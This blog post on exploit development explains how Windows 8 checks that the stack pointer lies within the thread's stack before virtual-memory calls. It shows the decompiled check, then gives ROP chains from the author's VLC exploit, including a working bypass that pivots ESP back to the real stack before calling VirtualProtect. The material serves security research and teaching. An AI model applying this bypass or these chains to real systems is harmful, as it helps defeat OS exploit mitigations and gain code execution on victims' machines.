Defeating Windows 8 ROP Mitigation

Windows 8 introduced a number of exploit mitigation features, including hardening of both the userland and kernel heaps, mitigation against kernel-mode NULL pointer dereferences, and protection against abuse of virtual function pointer tables. One feature that stood out to me appears to be designed to help mitigate exploits leveraging return-oriented programming (ROP).

Return-Oriented Programming

For those who don’t know, ROP is a generalization of the classic return-to-libc attack that involves leveraging small sequences of instructions, typically function epilogues, at known addresses to execute arbitrary code incrementally. This is achieved by controlling data pointed to by ESP, the stack pointer register, such that each ret instruction results in incrementing ESP and transferring execution to the next address chosen by the attacker.

Because finding sequences of useful instructions (known as “gadgets”) may be difficult depending on the exploitation scenario, most real ROP exploits use an initial ROP stager to create a writable and executable memory segment that a second-stage traditional shellcode can be copied into. Most frequently, VirtualProtect can be used to mark an existing executable segment writable, or VirtualAlloc can be used to create a fresh segment. Other variations also exist.

A second trait common to many ROP exploits is that the ROP payload itself often doesn’t live in the thread’s stack, due to either the nature of the vulnerability itself or limits on the attacker’s ability to introduce code into portions of the vulnerable application’s address space. Instead, it’s much more common for a ROP payload to be positioned in the heap and pivot the stack pointer into the heap, at which point the ROP payload can run.

Windows 8 ROP Mitigation

Microsoft has evidently been paying attention and noticed these two common factors. In an attempt to mitigate these types of exploits, Windows 8 implements a simple protection mechanism: every function associated with manipulating virtual memory, including the often-abused VirtualProtect and VirtualAlloc, now includes a check that the stack pointer, as contained in the trap frame, falls within the range defined by the Thread Environment Block (TEB). Code courtesy of Alex Ionescu:

    char __cdecl PsValidateUserStack()
    {
      char Status; // al@1
      _KTRAP_FRAME *TrapFrame; // ecx@3
      _TEB *Teb; // ecx@3
      void *.Eip; // [sp+10h] [bp-88h]@3
      unsigned int .Esp; // [sp+14h] [bp-84h]@3
      void *StackLimit; // [sp+18h] [bp-80h]@3
      void *StackBase; // [sp+1Ch] [bp-7Ch]@3
      _EXCEPTION_RECORD ExitStatus; // [sp+24h] [bp-74h]@6
      CPPEH_RECORD ms_exc; // [sp+80h] [bp-18h]@3

      CurrentThread = (_ETHREAD *)__readfsdword(0x124u);
      Status = LOBYTE(CurrentThread->Tcb.___u42.UserAffinity.Reserved[0]);// // PreviousMode == User
      if ( Status )
      {
        __asm { bt      dword ptr [edx+58h], 13h }  // // KernelStackResident, ReadyTransition, Alertable
        Status = _CF;
        if ( _CF != 1 )
        {
          TrapFrame = CurrentThread->Tcb.TrapFrame;
          .Esp = TrapFrame->HardwareEsp;
          .Eip = (void *)TrapFrame->Eip;
          Teb = (_TEB *)CurrentThread->Tcb.Teb;
          ms_exc.disabled = 0;
          StackLimit = Teb->DeallocationStack;
          StackBase = Teb->NtTib.StackBase;
          ms_exc.disabled = -2;
          Status = .Esp;
          if ( .Esp < (unsigned int)StackLimit || .Esp >= (unsigned int)StackBase )
          {
            memset(&ExitStatus, 0, 0x50u);
            ExitStatus.ExceptionCode = STATUS_STACK_BUFFER_OVERRUN;
            ExitStatus.ExceptionAddress = .Eip;
            ExitStatus.NumberParameters = 2;
            ExitStatus.ExceptionInformation[0] = 4;
            ExitStatus.ExceptionInformation[1] = .Esp;
            Status = DbgkForwardException(&ExitStatus, 1, 1);
            if ( !Status )
            {
              Status = DbgkForwardException(&ExitStatus, 0, 1);
              if ( !Status )
                Status = ZwTerminateProcess((HANDLE)0xFFFFFFFF, ExitStatus.ExceptionCode);
            }
          }
        }
      }
      return Status;
    }

As a result, exploits that leverage a ROP payload stored in the heap cannot return into VirtualProtect or VirtualAlloc to create a writable and executable segment. While this provides yet another hurdle for exploit writers, it’s fairly easy to bypass. Besides writing a full ROP payload that doesn’t have a second stage, which may be difficult depending on the availability of gadgets, one simple way of avoiding this protection is to give it what it wants: ensure ESP points into the current thread’s stack whenever virtual memory functions are called. In the below example, I’ll assume the attacker has access to the original stack pointer through some register, as is the case when a pivot is performed using an xchg instruction. If this isn’t the case, it may be worth investigating ways of finding the stack at runtime.

Bypassing the Mitigation

To demonstrate, let’s take the very basic ROP payload I used for a VLC exploit as an example. After triggering the vulnerability, I pivot the stack pointer into the heap using a gadget that executes the following:

    xchg esi, esp
    retn

In this case, the ESI register contains a pointer to heap data I control, so by pivoting the stack pointer into this region, I can execute my first-stage ROP payload:

rop = [
    rop_base + 0x1022,      # retn

    # Call VirtualProtect()
    rop_base + 0x2c283,     # pop eax; retn
    rop_base + 0x1212a4,        # IAT entry for VirtualProtect -> eax
    rop_base + 0x12fda,     # mov eax,DWORD PTR [eax]
    rop_base + 0x29d13,     # jmp eax

    rop_base + 0x1022,      # retn
    heap & ~0xfff,          # lpAddress
    0x60000,            # dwSize
    0x40,               # flNewProtect
    heap - 0x1000,          # lpfOldProtect

    # Enough of this ROP business...
    rop_base + 0xdace8              # push esp; retn
]

This payload pulls the address for VirtualProtect from the Import Address Table (IAT), calls it to mark the heap executable, and jumps into the newly-executable heap to run a second-stage traditional shellcode.

Because ESP points into the heap at the time of the VirtualProtect call, this exploit would fail due to the newly introduced mitigation in Windows 8. However, it’s relatively simple to adapt it to bypass this mitigation. Below is the updated ROP payload:

rop = [
    rop_base + 0x1022,      # retn

    # Write lpfOldProtect
    rop_base + 0x2c283,     # pop eax; retn
    heap - 0x1000,          # lpfOldProtect -> eax
    rop_base + 0x1db4f,     # mov [esi],eax; retn
    rop_base + 0x3ab5e,     # dec esi; retn
    rop_base + 0x3ab5e,     # dec esi; retn
    rop_base + 0x3ab5e,     # dec esi; retn
    rop_base + 0x3ab5e,     # dec esi; retn

    # Write flNewProtect
    rop_base + 0x2c283,     # pop eax; retn
    0x40,               # flNewProtect -> eax
    rop_base + 0x1db4f,     # mov [esi],eax; retn
    rop_base + 0x3ab5e,     # dec esi; retn
    rop_base + 0x3ab5e,     # dec esi; retn
    rop_base + 0x3ab5e,     # dec esi; retn
    rop_base + 0x3ab5e,     # dec esi; retn

    # Write dwSize
    rop_base + 0x2c283,     # pop eax; retn
    0x60000,            # dwSize -> eax
    rop_base + 0x1db4f,     # mov [esi],eax; retn
    rop_base + 0x3ab5e,     # dec esi; retn
    rop_base + 0x3ab5e,     # dec esi; retn
    rop_base + 0x3ab5e,     # dec esi; retn
    rop_base + 0x3ab5e,     # dec esi; retn

    # Write lpAddress
    rop_base + 0x2c283,     # pop eax; retn
    heap & ~0xfff,          # lpAddress -> eax
    rop_base + 0x1db4f,     # mov [esi],eax; retn
    rop_base + 0x3ab5e,     # dec esi; retn
    rop_base + 0x3ab5e,     # dec esi; retn
    rop_base + 0x3ab5e,     # dec esi; retn
    rop_base + 0x3ab5e,     # dec esi; retn

    # Write &Pivot
    rop_base + 0x2c283,     # pop eax; retn
    rop_base + 0x229a5,     # &pivot -> eax 
    rop_base + 0x1db4f,     # mov [esi],eax; retn
    rop_base + 0x3ab5e,     # dec esi; retn
    rop_base + 0x3ab5e,     # dec esi; retn
    rop_base + 0x3ab5e,     # dec esi; retn
    rop_base + 0x3ab5e,     # dec esi; retn

    # Write &VirtualProtect
    rop_base + 0x2c283,     # pop eax; retn
    rop_base + 0x1212a4,        # IAT entry for VirtualProtect -> eax
    rop_base + 0x12fda,     # mov eax,DWORD PTR [eax]
    rop_base + 0x1db4f,     # mov [esi],eax; retn

    # Pivot ESP
    rop_base + 0x229a5,     # xchg esi,esp; retn;

    # Jump into shellcode
    rop_base + 0xdace8              # push esp; retn
]

This is a very crude example, but I think it demonstrates the idea just fine. I write the arguments to VirtualProtect into the original stack, stored in the ESI register, one at a time. For the address that will be returned to coming out of VirtualProtect, I place a pivot to move ESP back to the heap. Finally, to trigger the whole thing, I actually return into my pivot gadget, which will pivot ESP back to the original stack and return into VirtualProtect.

In this case, adapting the exploit added an extra 124 bytes to the payload, but that was mostly due to the fact that I was limited on gadget availability and had to resort to decrementing ESI one value at a time. It’s probably possible to optimize this example with some extra work. In other cases, I’d expect it to be possible to implement this technique with much less overhead.